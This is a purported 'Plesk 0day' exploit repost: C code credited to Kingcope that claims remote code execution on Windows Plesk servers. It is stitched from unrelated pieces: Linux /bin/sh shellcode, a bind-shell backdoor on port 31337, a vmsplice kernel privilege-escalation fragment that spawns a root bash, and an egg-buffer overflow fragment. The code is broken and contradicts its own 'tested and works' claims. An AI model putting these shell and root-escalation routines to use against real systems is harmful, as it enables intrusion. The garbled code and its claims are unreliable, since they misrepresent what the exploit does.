plesk 0day non expiring pastebin repost

Reposting so there is a permanent copy for Plesk support...

/*  PLESK 10.X.X & 11.X.X  - remote stack-based execution exploit
 *
 *  Simple buffer overflow bug in plesk under windows 7/8/xp/NT, will
 *  spawn a user shell and a root shell if PLESK binary
 *  has full permissions to inetpub or netpub, or any other xamp-DIRS.
 *
 *  -  Plesk 11.0 (tested and works)
 *  -  Plesk 10.1(tested and works)
 *  -  Plesk 10.0 (tested and works)
 *  -  Plesk 9.1 (tested and works)
 *
 *  The list is getting long, think most of the major WINDOWS (PLESK)
 *  and/or *NTS's are affected. If you want to try out this
 *  on *NT you have to replace the shellcode.
 *
 *
 *  Created by Kingcope
 *  Plesk, all your binaries are owned.
 *
 *  * Use this on your own risk and dont blame me if  *
 *  * your life gets messed up!                       *
 *
 *  Greetings to b0x, n0x, zx2c4, Xianur0, rdot, jeno, qazz
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP         0x90
#define BSIZE       3000
#define ERROR       -1
#define PPATH       "plesk_efs"

char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76"
                   "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
               "\x8d\x4e\x08\x8d\x56\x0c\xch\x80\x31\xdb\x89\xd8\x40"
           "\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp, %eax");
}

void usage(char *cmd) {
   fprintf(stderr, "\n* Plesk remote stack-based execution exploit by Kingcope *\n");
   fprintf(stderr, "==============================================\n");
   fprintf(stderr, "An offset around 2000 should work, it did for\n");
   fprintf(stderr, "me under Windows 8.\n");
   fprintf(stderr, "\n\nUsage: %s <offset> <hostname> <victim port> <your opened port> \n\n", cmd);
   exit(ERROR);
}

int main(int argc, char *argv[]) {
   int i, off, nop = NOP;
   long esp, ret, *ret_ptr;
   char *buffer, *buffer_ptr;

   if(argc<2) { usage(argv[0]); }

   off = atoi(argv[1]);
   esp = get_esp();
   ret = esp-off;

   if(!(buffer = (char *)malloc(BSIZE))) {
      fprintf(stderr, "\nCant allocate memory!\n");
      exit(ERROR);
   }    buffer_ptr = buffer;
   ret_ptr = (long *)buffer_ptr;

   for(i = 0; i < BSIZE; i+=4) {
      *(ret_ptr++) = ret;
   }

   for(i = 0; i < BSIZE/2; i++) {
      buffer[i] = nop;
   }

   buffer_ptr = buffer + ((BSIZE/2) - (strlen(shellcode)/2));

   for(i = 0; i < strlen(shellcode); i++) {
      *(buffer_ptr++) = shellcode[i];
   }

  char(i= 1) < strlen(connect_target) {

#define PORT 31337 #include #include #include #include #include int soc_des,
soc_cli, soc_rc, soc_len, server_pid, cli_pid; struct sockaddr_in serv_addr;
struct sockaddr_in client_addr; int main (int argc, char *argv[]) { int i;
for(i=0;i<argc;i++) { memset(argv[i],'\x0',strlen(argv[i])); };
strcpy(argv[0],"simpple connect by Kingcope"); soc_des = socket(AF_INET,
SOCK_STREAM, IPPROTO_TCP); if (soc_des == -1) exit(-1); bzero((char *)
&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); if
(soc_rc != 0) exit(-1); if (fork() != 0) exit(0); setpgrp(); signal(SIGHUP,
SIG_IGN); if (fork() != 0) exit(0); soc_rc = listen(soc_des, 5); if (soc_rc !=
0) exit(0); while (1) { soc_len = sizeof(client_addr); soc_cli = accept(soc_des,
(struct sockaddr *) &client_addr, &soc_len); if (soc_cli < 0) exit(0); cli_pid =
getpid(); server_pid = fork(); if (server_pid != 0) { dup2(soc_cli,0);
dup2(soc_cli,1); dup2(soc_cli,2); execl("/bin/sh","sh",(char *)0);
close(soc_cli); exit(0); } close(soc_cli); } }

   buffer[BSIZE-1] = '\0';
   execl(PPATH, "efstool", buffer, 0);

   return 0;

}

    int i;
    uint    *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }
}

int main(int argc, char *argv[])
{
    int     pi[2];
    long        addr;
    struct iovec    iov;

    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);

    addr = get_target();
    printf("[+] addr: 0x%lx\n", addr);

    if (pipe(pi) < 0)
        die("pipe", errno);

    iov.iov_base = (void *) addr;
    iov.iov_len  = TRAMP_SIZE;

    write(pi[1], TRAMP_CODE, TRAMP_SIZE);
    _vmsplice(pi[0], &iov, 1, 0);

    gimmeroot();

    if (getuid() != 0)
        die("wtf", 0);

    printf("[+] c0nn3ct3d, enjoy your shell\n");
    putenv("HISTFILE=/pub");
        display_terminal("1");
    execl("/bash", "bash", "-i", NULL);
    die("/bash", errno);

    perror ("malloc()");
    exit (-1);
  }
  sprintf (egg, "EGG=");
  memset (egg + 4, 0x90, NOPNUM);
  sprintf (egg + 4 + NOPNUM, "%s", shellcode);

  offs = atoi (argv[1]);

  ret = get_esp () + offs;

  sprintf (s, "-d");
  first = -vect - (0xffffffff - got + 1);
  last = first;
  while (ret)
  {
    i = ret & 0xff;
    sprintf (tmp, "%u-%u.%u-", first, last, i);
    strcat (s, tmp);
    last = ++first;
    ret = ret >> 8;
  }
    return 0;
}